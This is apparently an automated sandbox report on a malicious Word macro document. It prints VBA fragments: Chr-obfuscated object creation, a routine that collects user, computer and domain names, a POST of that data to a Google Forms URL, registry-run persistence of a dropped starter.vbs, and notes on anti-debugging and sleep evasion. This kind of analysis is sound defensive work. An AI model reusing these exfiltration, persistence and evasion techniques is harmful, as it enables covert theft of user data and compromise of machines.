Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AP6fuezipn4, String createobject: Set AM1wg7xyr = CreateObject((Chr(10 + 67) & Chr(85 + 30) & Chr(85 + 35) & Chr(- 97 + 206) & Chr(- 64 + 172) & Chr(61 + - 11) & Chr(- 42 + 88) & Chr(- 77 + 145) & Chr(- 93 + 172) & Chr(- 52 + 129) & Chr(39 + 29) & Chr(87 + 24) & Chr(- 70 + 169) & Chr(- 33 + 150) & Chr(12 + 97) & Chr(- 13 + 114) & Chr(33 + 77) & Chr(- 22 + 138) & Chr(- 65 + 111) & Chr(27 + 24) & Chr(68 + - 22) & Chr(71 + - 23)))	Name: AP6fuezipn4
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AR4ql6nqd, String createobject: Set AU3sjrvsqt3j = CreateObject((Chr(- 94 + 159) & Chr(3 + 65) & Chr(- 12 + 91) & Chr(60 + 8) & Chr(- 85 + 151) & Chr(38 + 8) & Chr(- 2 + 85) & Chr(20 + 96) & Chr(68 + 46) & Chr(83 + 18) & Chr(- 71 + 168) & Chr(62 + 47)))	Name: AR4ql6nqd
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, String createobject: Set AU3sjrvsqt3j = CreateObject((Chr(- 6 + 71) & Chr(89 + - 21) & Chr(52 + 27) & Chr(61 + 7) & Chr(39 + 27) & Chr(- 9 + 55) & Chr(56 + 27) & Chr(- 52 + 168) & Chr(39 + 75) & Chr(5 + 96) & Chr(57 + 40) & Chr(22 + 87)))	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function clearStr, String createobject: Set RE = CreateObject("VBScript.RegExp")	Name: clearStr
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function cuid, String createobject: Set FSO = CreateObject("Scripting.FileSystemObject")	Name: cuid
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function GetUserData, String environ: GetUserData = "UserName: " & Environ$("USERNAME") & " \| " & "ComputerName: " & Environ$("COMPUTERNAME") & " \| " & "UserDomain: " & Environ$("USERDOMAIN")	Name: GetUserData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function sendFormData, String createobject: Set HttpRequest = CreateObject("MSXML2.XMLHTTP")	Name: sendFormData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function folderInit, String wscript: Set sh = CreateObject("WScript.Shell")	Name: folderInit
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function folderInit, String createobject: Set sh = CreateObject("WScript.Shell")	Name: folderInit
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function folderInit, String environ: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	Name: folderInit
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_runer, String wscript: Set sh = CreateObject("WScript.Shell")	Name: ggl_runer
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_runer, String createobject: Set sh = CreateObject("WScript.Shell")	Name: ggl_runer
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_runer, String environ: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	Name: ggl_runer
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_starter, String wscript: Set sh = CreateObject("WScript.Shell")	Name: ggl_starter
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_starter, String createobject: Set sh = CreateObject("WScript.Shell")	Name: ggl_starter
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_starter, String environ: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	Name: ggl_starter
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_hex, String wscript: Set sh = CreateObject("WScript.Shell")	Name: ggl_hex
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_hex, String createobject: Set sh = CreateObject("WScript.Shell")	Name: ggl_hex
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_hex, String environ: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	Name: ggl_hex
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_hex, String wscript: procID = Shell("wscript " & figName, vbHide)	Name: ggl_hex
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String wscript: Set sh = CreateObject("WScript.Shell")	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String createobject: Set sh = CreateObject("WScript.Shell")	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String wscript: Dim wscript_pthpath	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String wscript: wscript_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\System32\WScript.exe"	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String environ: wscript_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\System32\WScript.exe"	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String environ: run_pth_scr = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") + "\TransbaseOdbcDriver" + "\starter.vbs"	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String wscript: run_pth = """" & wscript_pthpath & """ """ & run_pth_scr & """"	Name: SetRegData

Document contains an embedded VBA with base64 encoded strings

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_runer, String RGltIG9iakZTTywgb2JqU2hlbGwsIHN0ckZpbGUsIFJlYWRBbGxUZXh0RmlsZQ0KU2V0IG9iakZT
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_starter, String RGltIG9ialNoZWxsLHBhdGgNClNldCBvYmpTaGVsbCA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCAi
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AutoOpen, String MzNXOTlmZw==

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Show sources

Source: form.doc	Stream path 'Macros/VBA/NewMacros' : found possibly 'ADODB.Stream' functions open, writetext, position, read, write, readtext
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AR4ql6nqd, API Stream.Open()	Name: AR4ql6nqd
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, API Stream.Open()	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, API Stream.Write(???:Byte())	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, API Stream.Write(?????????????????????????4????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????:Byte())	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, API Stream.Write(???????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????\xfffd\xfffd??????????????????????4?????????:Byte())	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, API Stream.Write(?????????????????????????????????????????????????????????????4??????????????????????????????????????????????????????????????/???????????????\xfffd?????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????\xfffd???????????????????????????????\xfffd?????4????\xfffd????????????????????????\xfffd\xfffd????????\xfffd?????????????????????\xfffd????????????????\xfffd\xfffd\xfffd????????????????\xfffd\xfffd??'?????????????\xfffd\xfffd\xfffd?????????????????\xfffd\xfffd\xfffd??????????\xfffd\xfffd??'?????????????'????\xfffd\xfffd\xfffd??????'\xfffd?????????????\xfffd\xfffd\xfffd??????\xfffd????\xfffd\xfffd\xfffd??????????\xfffd\xfffd\xfffd\xfffd??????????\xfffd\xfffd??????????????\xfffd\xfffd\xfffd\xfffd??????\xfffd\xfffd\xfffd???\xfffd\xfffd\xfffd???????4???????????????????????????????????????????????????????????\xfffd????\xfffd?????????????\xfffd???????????????????????????????\xfffd?????4????\xfffd???????	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function sendFormData, API IXMLHTTPRequest.Open("POST","https://docs.google.com/forms/d/1F1zY2cODJxkCCorfv42kif4mxDsZ__BpXourgrkCtyo/formResponse",False)	Name: sendFormData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AR4ql6nqd, found possibly 'ADODB.Stream' functions open, writetext, position, read	Name: AR4ql6nqd
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, found possibly 'ADODB.Stream' functions open, write, position, readtext	Name: AV0kftndmk

Document contains an embedded VBA with functions possibly related to HTTP operations

Show sources

Source: form.doc	Stream path 'Macros/VBA/NewMacros' : found possibly 'XMLHttpRequest' functions open, setrequestheader, send, readystate, statustext
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function sendFormData, found possibly 'XMLHttpRequest' functions open, setrequestheader, send, readystate, statustext			Name: sendFormData

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Show sources

Source: form.doc

Stream path 'Macros/VBA/NewMacros' : found possibly 'WScript.Shell' functions expandenvironmentstrings, regwrite, run

Potential malicious VBS script found (suspicious strings)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Dropped file: Set objFSO = CreateObject("Scripting.FileSystemObject")
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Dropped file: Set objShell = WScript.CreateObject( "WScript.Shell" )
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Dropped file: strFile = objShell.ExpandEnvironmentStrings("%ALLUSERSPROFILE%\TransbaseOdbcDriver\LanCradDriver.ini")
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Dropped file: Set objShell = WScript.CreateObject( "WScript.Shell" )
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Dropped file: path = objShell.ExpandEnvironmentStrings("%ALLUSERSPROFILE%\TransbaseOdbcDriver\TransbaseOdbcDriver.js")

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: WINWORD.EXE, wscript.exe	Binary or memory string: Progman
Source: WINWORD.EXE, wscript.exe	Binary or memory string: Program Manager
Source: WINWORD.EXE, wscript.exe	Binary or memory string: Shell_TrayWnd

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Network Connect: 216.58.206.14 187
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Network Connect: 23.43.139.27 80
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Network Connect: 74.125.232.238 80
Source: C:\Windows\System32\wscript.exe	Network Connect: 172.217.22.46 187
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Network Connect: 23.51.117.163 80

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\wscript.exe

System information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\wscript.exe TID: 3264	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3264	Thread sleep time: -60000s >= -60s

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Document contains OLE streams with high entropy indicating encrypted embedded content

Show sources

Source: form.doc

Stream path 'Data' entropy: 7.98136640998 (max. 8.0)

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\wscript.exe

Queries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Software Vulnerabilities:

Networking:

Boot Survival:

Stealing of Sensitive Information:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot